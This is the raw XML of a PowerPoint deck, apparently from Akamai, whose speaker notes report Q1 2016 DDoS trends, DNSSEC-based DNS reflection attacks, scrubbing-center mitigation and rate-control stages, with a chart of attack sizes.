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340" r:id="rId2"/>
    <p:sldId id="408" r:id="rId3"/>
    <p:sldId id="454" r:id="rId4"/>
    <p:sldId id="449" r:id="rId5"/>
    <p:sldId id="424" r:id="rId6"/>
    <p:sldId id="426" r:id="rId7"/>
    <p:sldId id="432" r:id="rId8"/>
    <p:sldId id="446" r:id="rId9"/>
    <p:sldId id="431" r:id="rId10"/>
    <p:sldId id="448" r:id="rId11"/>
    <p:sldId id="455" r:id="rId12"/>
    <p:sldId id="450" r:id="rId13"/>
    <p:sldId id="443" r:id="rId14"/>
    <p:sldId id="452" r:id="rId15"/>
    <p:sldId id="388" r:id="rId16"/>
    <p:sldId id="392" r:id="rId17"/>
    <p:sldId id="435" r:id="rId18"/>
    <p:sldId id="434" r:id="rId19"/>
    <p:sldId id="433" r:id="rId20"/>
    <p:sldId id="410" r:id="rId21"/>
    <p:sldId id="412" r:id="rId22"/>
    <p:sldId id="413" r:id="rId23"/>
    <p:sldId id="415" r:id="rId24"/>
    <p:sldId id="416" r:id="rId25"/>
    <p:sldId id="436" r:id="rId26"/>
    <p:sldId id="444" r:id="rId27"/>
    <p:sldId id="445" r:id="rId28"/>
    <p:sldId id="417" r:id="rId29"/>
    <p:sldId id="451" r:id="rId30"/>
    <p:sldId id="439" r:id="rId31"/>
    <p:sldId id="440" r:id="rId32"/>
    <p:sldId id="441" r:id="rId33"/>
    <p:sldId id="442" r:id="rId34"/>
    <p:sldId id="389" r:id="rId35"/>
  </p:sldIdLst>
  <p:sldSz cx="14630400" cy="8229600"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr marL="0" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="653044" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="1306090" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1959135" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="2612181" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="3265225" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="3918270" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="4571314" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2600" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="5224359" algn="l" defTabSz="130609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p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="529">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="1392">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="4261">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="485">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="57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191919"/>
    <a:srgbClr val="2196C6"/>
    <a:srgbClr val="FF9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8980" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="228" y="180"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="5120"/>
        <p:guide orient="horz" pos="529"/>
        <p:guide orient="horz" pos="1392"/>
        <p:guide pos="4261"/>
        <p:guide pos="485"/>
        <p:guide pos="570"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="34" d="100"/>
        <a:sy n="34" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">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mm\Documents\attack_siz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08311461067358E-2"/>
          <c:y val="1.747321706766853E-2"/>
          <c:w val="0.90406559271834142"/>
          <c:h val="0.89648051144026542"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numLit>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Lit>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$A$2:$N$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>22</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>79</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>82</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>190</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>321</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>309</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>623</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>109</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1350</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-86D8-49BC-BF6B-D94DCD0722C4}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="126591744"/>
        <c:axId val="126593280"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="126591744"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="126593280"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="126593280"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="12659174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B27A5B-6AA7-4831-AE90-933BF8015E5C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/13/2019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5B2F9F-BBE6-43A5-B27A-C013A4A6E474}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1489368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99016-F88A-4BD5-941D-B455B73AB02B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2/13/2019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C09F6-2038-456A-9430-D3278C72B9DD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2414062692"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:notesStyle>
    <a:lvl1pPr marL="0" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="653044" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="1306090" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1959135" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="2612181" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="3265225" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="3918270" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="4571314" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1700" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="5224359" algn="l" defTabSz="130609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2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7FDC09F6-2038-456A-9430-D3278C72B9DD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1139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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A record 19 attacks exceeded 100 Gbps, the largest hitting the software &amp; technology, gaming, and media &amp; entertainment sectors.</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That’s a significant increase from the five DDoS attacks that registered more than 100 Gbps in Q4 2015.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Looking back further, there were 8 mega attacks in Q3 2015 and 17 inQ3 2014 — the previous record.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In Q1 2016, the largest DDoS attack measured 289 Gbps, a 20-point drop over the largest attack in the previous quarter (309 Gbps).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Most of the mega attacks seemed to use tools common to booters/stressers.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Of the 19 mega attacks, 14 used dns reflection attacks. Although not as powerful as the early days of dns reflection, these campaigns produced significant attack bandwidth partly due to the increased amplification factor produced by the use of Domain Name System Security Extensions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) domains.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0B6138C-E721-E14B-B05C-1EF830564EB3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361410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lgn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The target of the spotlight attack was an Akamai customer in the media industry. Media sites often become targets based on the news they publish. Groups such as Anonymous often use DDoS attacks as a form of digital protest. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The spotlight attack was distributed and mitigated across five scrubbing centers, as depicted in the next slide. The bulk of the traffic was routed through Akamai’s Frankfurt scrubbing center.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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The tools used in these attacks are accessible to even lesser-skilled actors. Using sites offering stress-testing services makes it difficult for the target to determine true attribution.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The attack included both UDP fragment and DNS attack vectors.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One standout was the abuse of domains that were DNSSEC-ENABLED.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This is not a new attack method; however, the increased use of DNSSEC enabled legitimate domains is being leveraged by malicious actors in the latest flurry of attacks.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In the earlier days of DNS attacks, it was common to see domains that were purposely set up to produce the highest possible amplification factor. By using a legitimate domain with DNSSEC-enabled, mitigation becomes a bit more complicated. If all DNS resolution requests for these domains are dropped, this could potentially result in a Denial of Service (DoS) effect for legitimate users of the abused domain.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In addition to mitigation issues for the DNS resolver, some DNSSEC-enabled domains have produced response sizes in excess of 4,000 bytes. This extra-large payload size makes DNSSEC-enabled domains attractive to use in reflection attacks. </a:t>
            </a:r>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The problem is that open DNS resolvers attempt to resolve any domain, even if the server does not have the domain configured locally. In the latter case, the DNS resolvers will send a query out to the domain and will often cache the response. During an attack, a rapid rate of queries is continuously sent to the open DNS resolver, which dutifully responds to the listed source address. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="816388" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="816388"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In an attack scenario, the target host receiving the unsolicited dns reply traffic would not attempt a tcp retry, since it never made the request. In reality, the traffic would likely never reach the target server due to filtering at the edge of the network. But it can still cause issues due to the amount of traffic generated by the large dns response floods. In this case, the dns flood generated 230 Gbps. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="816388" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" indent="-171450" algn="just" defTabSz="81638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rgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="11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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19744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dirty="0"/>
              <a:t>Rate accounting can be done at various stages of the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> HTTP message’s path through the Akamai host.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The orange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> dots indicate where the rate accounting is done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The first stage that an incoming request </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of where the different stages are applicable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Client Request – Block bots from scouring pages from site (cached or non-cached)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	   - Also if you want to “clock/account” all requests to your site, not just those that are not cached.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Forward Request – Requests just before they are served to the origin server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	       - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Usefull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> if you do not want to account for requests that get served off origin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Forward Response – Accounts the responses observed from the origin server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The request/response that finally pushes the rate control over the edge is allowed through all subsequent request will put in the penalty box.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0"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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214348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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="762447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0" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2040433"/>
            <a:ext cx="10607040" cy="747439"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="909547" indent="0">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="3096449"/>
            <a:ext cx="6550677" cy="501217"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="915897" indent="0">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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0" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1732656"/>
            <a:ext cx="10607040" cy="1362992"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="909547" indent="0">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
